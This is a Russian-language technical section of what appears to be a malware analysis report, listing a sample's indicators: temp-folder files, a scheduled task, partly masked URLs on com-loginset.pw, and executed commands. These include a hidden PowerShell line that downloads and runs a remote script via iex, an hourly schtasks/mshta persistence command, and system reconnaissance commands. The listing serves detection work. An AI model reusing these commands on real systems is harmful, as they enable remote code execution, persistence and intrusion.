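Техническая информация
Ниже перечислены артефакты образца: пути к файлам, задача планировщика, сетевые обращения и запускаемые команды. Символы «#» в адресах, по-видимому, маскируют часть имени узла и параметров запроса, поэтому такие строки нельзя использовать как точные индикаторы: сопоставлять следует видимую часть домена (com-loginset.pw), пути к файлам и имена задач.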
- <SYSTEM32>\tasks\usernetes
- \http://pa#.####r.com-loginset.pw/home/?ne########
- %TEMP%\wefds234\cominfo.txt
- %TEMP%\sd54g2\traea
- %TEMP%\sd54g2\traeb
- %TEMP%\sd54g2\traec
- %TEMP%\wefds234\cominfo.txt
- %TEMP%\sd54g2\traea
- %TEMP%\sd54g2\traeb
- http://pa#.####r.com-loginset.pw/home/?ch#################
- http://pa#.####r.com-loginset.pw/home/?ie#################
- http://pa#.####r.com-loginset.pw/home/?Ne#################
- DNS ASK pa#.####r.com-loginset.pw
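- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden "$Enc=[uri]::EscapeDataString([Environment]::UserDomainName+$env:USERNAME.Substring(0, 2));iex (New-Object System.Net.WebClient).DownloadString(\"http://pa#.####r.com-log...' (со скрытым окном; команда в отчёте обрезана. Видимая часть формирует строку $Enc из имени домена и первых двух символов имени пользователя, затем загружает сценарий по HTTP и выполняет его через iex)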
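- '%WINDIR%\syswow64\schtasks.exe' /create /tr "mshta %APPDATA%\UserDis.hta" /tn UserNetEs /st 01:10 /sc hourly /f (закрепление в системе: задача планировщика UserNetEs ежечасно запускает %APPDATA%\UserDis.hta через mshta; ей соответствует файл <SYSTEM32>\tasks\usernetes из списка выше)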
- '%WINDIR%\syswow64\schtasks.exe' /delete /tn UserNetEn /f
- '%WINDIR%\syswow64\systeminfo.exe'
- '%WINDIR%\syswow64\ipconfig.exe'
- '%WINDIR%\syswow64\netstat.exe' -ano
- '%WINDIR%\syswow64\tree.com' /f A:\
- '%WINDIR%\syswow64\tree.com' /f B:\
- '%WINDIR%\syswow64\tree.com' /f C:\